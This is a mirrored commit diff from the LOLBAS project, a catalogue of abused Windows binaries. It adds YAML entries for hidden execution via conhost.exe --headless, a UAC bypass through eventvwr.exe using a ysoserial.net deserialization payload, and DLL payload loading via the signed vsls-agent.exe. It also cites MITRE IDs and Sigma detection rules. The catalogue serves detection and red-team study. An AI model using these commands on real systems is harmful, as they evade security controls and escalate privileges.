mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-10-25 14:55:19 +02:00 
			
		
		
		
	Add vsls-agent lolbin and committing a few other changes (#263)
Co-authored-by: Wietze <wietze@users.noreply.github.com>
This commit is contained in:
		| @@ -11,6 +11,13 @@ Commands: | ||||
|     Privileges: User | ||||
|     MitreID: T1202 | ||||
|     OperatingSystem: Windows 10, Windows 11 | ||||
|   - Command: "conhost.exe --headless calc.exe" | ||||
|     Description: Execute calc.exe with conhost.exe as parent process | ||||
|     Usecase: Specify --headless parameter to hide child process window (if applicable) | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1202 | ||||
|     OperatingSystem: Windows 10, Windows 11 | ||||
| Full_Path: | ||||
|   - Path: c:\windows\system32\conhost.exe | ||||
| Detection: | ||||
| @@ -19,6 +26,8 @@ Detection: | ||||
| Resources: | ||||
|   - Link: https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ | ||||
|   - Link: https://twitter.com/Wietze/status/1511397781159751680 | ||||
|   - Link: https://twitter.com/embee_research/status/1559410767564181504 | ||||
|   - Link: https://twitter.com/ankit_anubhav/status/1561683123816972288 | ||||
| Acknowledgement: | ||||
|   - Person: Adam | ||||
|     Handle: '@hexacorn' | ||||
|   | ||||
| @@ -14,9 +14,9 @@ Commands: | ||||
|   - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe | ||||
|     Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net | ||||
|     Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. | ||||
|     Category: Execute | ||||
|     Category: UAC Bypass | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1202 | ||||
|     MitreID: T1548.002 | ||||
|     OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full_Path: | ||||
|   - Path: C:\Windows\System32\eventvwr.exe | ||||
|   | ||||
							
								
								
									
										22
									
								
								yml/OtherMSBinaries/vsls-agent.yml
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										22
									
								
								yml/OtherMSBinaries/vsls-agent.yml
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,22 @@ | ||||
| --- | ||||
| Name: vsls-agent.exe | ||||
| Description: Agent for Visual Studio Live Share (Code Collaboration) | ||||
| Author: Jimmy (@bohops) | ||||
| Created: 2022-11-01 | ||||
| Commands: | ||||
|   - Command: vsls-agent.exe --agentExtensionPath c:\path\to\payload.dll | ||||
|     Description: Load a library payload using the --agentExtensionPath parameter (32-bit) | ||||
|     Usecase: Execute proxied payload with Microsoft signed binary | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed) | ||||
| Full_Path: | ||||
|   - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe | ||||
| Detection: | ||||
|   - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml | ||||
| Resources: | ||||
|   - Link: https://twitter.com/bohops/status/1583916360404729857 | ||||
| Acknowledgement: | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
		Reference in New Issue
	
	Block a user